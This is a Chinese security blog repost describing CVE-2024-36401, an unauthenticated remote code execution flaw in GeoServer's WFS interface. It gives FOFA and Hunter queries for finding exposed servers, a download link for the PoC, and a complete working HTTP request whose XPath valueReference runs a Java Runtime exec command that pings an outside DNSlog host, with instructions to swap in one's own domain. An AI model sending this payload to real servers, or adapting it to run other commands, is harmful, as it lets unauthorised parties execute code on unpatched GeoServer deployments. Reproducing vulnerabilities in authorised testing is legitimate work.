GeoServer前台wfs接口处存在RCE漏洞 poc

admin

109425
文章

90
评论

2024年7月3日13:05:51评论4 views字数 779阅读2分35秒阅读模式

02 漏洞描述

GeoServer是一个开源服务器，用于共享、处理和编辑地理空间数据。它支持多种地图和数据标准，使用户能够通过网络访问和操作地理信息系统（GIS）数据。

GeoServer前台wfs接口存在RCE远程代码执行漏洞(CVE-2024-36401)。

03 测绘查询-系统指纹

fofa：app="GeoServer"

鹰图：app.name=="GeoServer"

GeoServer前台wfs接口处存在RCE漏洞 poc

04 漏洞复现

1、访问漏洞系统

GeoServer前台wfs接口处存在RCE漏洞 poc

2、访构造数据包，访问Dnslog

GeoServer前台wfs接口处存在RCE漏洞 poc

3、查看Dnslog

GeoServer前台wfs接口处存在RCE漏洞 poc

获取漏洞POC

链接: https://pan.baidu.com/s/1MppnudfvYSjzMt1VV5oDtA?pwd=9aiw 提取码: 9aiw

POST /geoserver/wfs HTTP/1.1
Host: ip
Content-Type: application/xml
Content-Length: 336
 
<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'
 valueReference='exec(java.lang.Runtime.getRuntime(),"ping a1b7a5.dnslog.cn -c 1")'>
 <wfs:Query typeNames='topp:states'/>
</wfs:GetPropertyValue>
 
 
修改a1b7a5.dnslog.cn为你的dnslog

原文始发于微信公众号（安羽安全）：【漏洞复现】GeoServer前台wfs接口处存在RCE漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

GeoServer前台wfs接口处存在RCE漏洞 poc

03 测绘查询-系统指纹

04 漏洞复现

获取漏洞POC

0day|GeoServer远程代码执行漏洞(CVE-2024-36401)

Geoserver最全历史漏洞详解

HTTP File Server代码执行漏洞(CVE-2024-23692)

【攻防演练】GeoServer property 表达式注入代码执行漏洞（CVE-2024-36401）

[含POC]宏景eHR LoadOtherTreeServlet SQL注入漏洞

Love-Yi情侣网站3.0存在SQL注入漏洞

Geoserver JXPath表达式注入致远程代码执行漏洞(CVE-2024-36401)

Geoserver Xpath 属性名表达式前台RCE漏洞（CVE-2024-36401）

Artifex Ghostscript任意代码执行漏洞（CVE-2024-29510）

CVE-2024-34331：Parallels Repack 权限提升

发表评论

在线咨询

微信